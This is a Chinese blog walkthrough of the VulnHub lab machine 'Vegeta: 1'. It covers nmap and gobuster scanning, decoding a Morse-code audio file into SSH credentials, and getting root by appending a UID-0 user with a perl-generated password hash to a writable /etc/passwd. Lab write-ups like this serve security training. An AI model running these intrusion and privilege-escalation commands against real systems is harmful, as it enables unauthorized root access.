当前位置:网站首页>vulnhub Vegeta: 1
vulnhub Vegeta: 1
2022-06-24 19:39:00 【仙女象】
渗透思路:
nmap扫描----gobuster扫描网站目录----在线解码摩斯电码,得到ssh用户名密码----/etc/passwd写入用户提权
环境信息:
靶机:192.168.101.77
攻击机:192.168.101.34
具体步骤:
1、nmap扫描
sudo nmap -sV -sC -p- 192.168.101.77
2、dirb扫描网站目录(兔子洞)
dirb http://192.168.101.77发现http://192.168.101.77/robots.txt
(下面是一个兔子洞)
浏览器访问http://192.168.101.77/robots.txt,发现/find_me
浏览器访问/find_me,点击find_me.html,并查看网页源代码
view-source:http://192.168.101.77/find_me/find_me.html
拉到最下面发现一大段注释(没啥用就不复制粘贴了)
base64解码之后还是一堆没有意义的乱码,此路不通
3、gobuster扫描网站目录
gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt扫描到/bulma
http://192.168.101.77/bulma/是个目录,里面有个文件hahahaha.wav
下载下来听了一下,感觉是摩斯电码
4、在线解码摩斯电码,得到ssh用户名密码
找了个在线翻译器:Morse Code Audio Decoder | Morse Code World
按upload上传hahahaha.wav,然后按play,自动转为文本信息
得到的结果是
USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)
以用户名trunks,密码u$3r进行ssh登录
ssh [email protected]
5、/etc/passwd写入新用户提权
查看/home/trunks/.bash_history,发现其中有向/etc/passwd写入新用户的操作
查看/etc/passwd的文件权限
ls -al /etc/passwd发现trunks用户有写权限
参考/home/trunks/.bash_history中的命令,先用perl生成加密的用户密码
perl -le 'print crypt("123456","addedsalt")'以上命令中,用户的明文密码为123456
然后再将新用户test写入/etc/passwd
echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd
最后切换到test用户,输入密码123456,获得root权限,并在/root目录下找到root.txt
su - test
边栏推荐
- 网上立案流程
- The core concept of JMM: happens before principle
- 【WSL】SSH 远程连接及宿主机端口转发配置
- Envoy obtain the real IP address of the client
- Basic principles of spanning tree protocol
- Main steps of system test
- Learn more about the practical application of sentinel
- Tetris
- Future development of education industry of e-commerce Express
- Idea close global search box
猜你喜欢
Chapter 10 project communication management
Layer 2 and layer 3 forwarding principle based on VLAN
Data center basic network platform
Panorama of enterprise power in China SSD industry
Leetcode: calculate the number of elements less than the current element on the right (sortedlist+bisect\u left)
Basic principles of spanning tree protocol
Row and column differences in matrix construction of DX HLSL and GL glsl
Learn more about the practical application of sentinel
Redis-跳表
Seven principles of software design
随机推荐
Programmers become gods by digging holes in one year, carrying flags in five years and becoming gods in ten years
Embedded development: tips and tricks -- clean jump from boot loader to application code
Docker installs MySQL 8.0. Detailed steps
VRRP skills topic
使用Aggregated APIServer扩展你的kubernetes API
Future development of education industry of e-commerce Express
OSPF basic content
YGG recent game partners list
The difference between interceptor and filter
结合源码剖析Oauth2分布式认证与授权的实现流程
AQS源码分析
Attackg: constructing technical knowledge graph from cyber thread intelligence reports
Visitor tweets tell you which groups are consuming blind boxes
Technology inventory: past, present and future of Message Oriented Middleware
Problèmes de concurrence dans l'allocation de mémoire en tas
How to automatically remove all . orig files in Mercurial working tree?
Description of transparent transmission function before master and slave of kt6368a Bluetooth chip, 2.4G frequency hopping automatic connection
Kubevela v1.2 release: the graphical operation console velaux you want is finally here
Redis hop table
【Mongodb】READ_ME_TO_RECOVER_YOUR_DATA,数据库被恶意删除